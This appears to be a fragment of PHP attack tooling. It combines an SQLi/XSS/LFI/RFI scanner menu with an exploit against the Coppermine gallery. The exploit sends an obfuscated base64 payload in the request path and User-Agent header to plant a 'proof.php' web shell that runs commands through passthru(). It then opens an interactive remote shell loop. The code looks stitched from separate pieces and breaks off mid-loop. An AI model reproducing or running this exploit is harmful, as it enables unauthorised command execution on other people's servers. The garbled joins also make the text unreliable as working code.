function full($site)
{
print "[-] Start full scanning mode.\n";
pmapwn($site, 1);
print "[-] Start SQL Injection Scan\n";
sql($site, 1);
print "[-] Start XSS Scan\n";
xss($site, 1);
print "[-] Start RFI Scan\n";
rfi($site, 1);
print "[-] Start LFI Scan\n";
lfi($site, 1);
}
function scan()
{
print "\n Options:\n";
print " sqli - SQL Injection\n";
print " xss - Cross Site Scripting\n";
print " lfi - Local File Inclusion\n";
print " rfi - Remote File Inclusion\n";
print " all - F**k shit up\n";
print " What: ";
$choice = fopen("php://stdin", "r");
$what = fgets($choice);
print "\n File: ";
$choicef = fopen("php://stdin", "r");
$whatf = fgets($choicef);
$whatf = trim($whatf);
if (file_exists('out/' . $whatf)) {
if (trim($what) == 'sqli' || trim($what) == 'all' || trim($what) == 'sqli&xss') {
print "\n\n - Testing SQL Injection for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
$urls = file('out/' . $whatf);
foreach ($urls as $link) {
sqli(urldecode($link));
}
}
if (trim($what) == 'xss' || trim($what) == 'all' || trim($what) == 'sqli&xss') {
print "\n\n - Testing Cross Site Scripting for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
$urls = file('out/' . $whatf);
foreach ($urls as $link) {
xss(urldecode($link));
}
}
if (trim($what) == 'lfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) {
print "\n\n - Testing Local File Inclusion for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
$urls = file('out/' . $whatf);
foreach ($urls as $link) {
lfi(urldecode($link));
}
}
if (trim($what) == 'rfi' || trim($what) == 'all' || trim($what == 'lfi&rfi')) {
print "\n\n - Testing Remote File Inclusion for " . count(file('out/' . $whatf)) . " parameters ({$whatf})\n";
$urls = file('out/' . $whatf);
foreach ($urls as $link) {
rfi(urldecode($link));
}
}
} else {
print "\nFile doesnt exist!\n";
}
}
die;
}
$host = $argv[1];
$path = $argv[2];
get_info();
print "\n[-] Version..........: {$version}";
print "\n[-] Cookie name......: {$cookie}";
print "\n[-] Path disclosure..: {$path_disc}\n\n";
if (first_time()) {
$code = base64_decode("PD9waHA7JGY9Zm9wZW4oY2hyKDExMikuY2hyKDExNCkuY2hyKDExMSkuY2hyKDExMSkuY2hyKDEwMikuY2hyKDQ2KS5jaHIoM" . "TEyKS5jaHIoMTA0KS5jaHIoMTEyKSxjaHIoMTE5KSk7ZndyaXRlKCRmLGNocig2MCkuY2hyKDYzKS5jaHIoMTEyKS5jaHIoMT" . "A0KS5jaHIoMTEyKS5jaHIoMzIpLmNocigxMDEpLmNocig5OSkuY2hyKDEwNCkuY2hyKDExMSkuY2hyKDMyKS5jaHIoMzkpLmN" . "ocig5NSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTUpLmNocigzOSkuY2hyKDU5KS5jaHIoMzIp" . "LmNocigxMTIpLmNocig5NykuY2hyKDExNSkuY2hyKDExNSkuY2hyKDExNikuY2hyKDEwNCkuY2hyKDExNCkuY2hyKDExNykuY" . "2hyKDQwKS5jaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuY2hyKDEwMC" . "kuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoNDApLmNocigzNikuY2hyKDk1KS5jaHI" . "oODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2hyKDgyKS5jaHIoOTEpLmNocigzOSkuY2hyKDcyKS5jaHIo" . "ODQpLmNocig4NCkuY2hyKDgwKS5jaHIoOTUpLmNocig2NykuY2hyKDc3KS5jaHIoNjgpLmNocigzOSkuY2hyKDkzKS5jaHIoN" . "DEpLmNocig0MSkuY2hyKDU5KS5jaHIoMzIpLmNocig2MykuY2hyKDYyKSk7ZmNsb3NlKCRmKTtkaWUoX0xmSV8pOz8+");
$packet = "GET {$path}{$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "User-Agent: {$code}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
if (!lfi()) {
die("\n[-] Exploit failed...\n");
}
}
while (1) {
print "\ncoppermine-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit") {
$packet = "GET {$path}proof.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
list($header, $payload) = explode("_code_", http_send($host, $packet));
preg_match("/200 OK/", $header) ? print "\n{$payload}" : die("\n[-] Exploit failed...\n");
} else {
break;
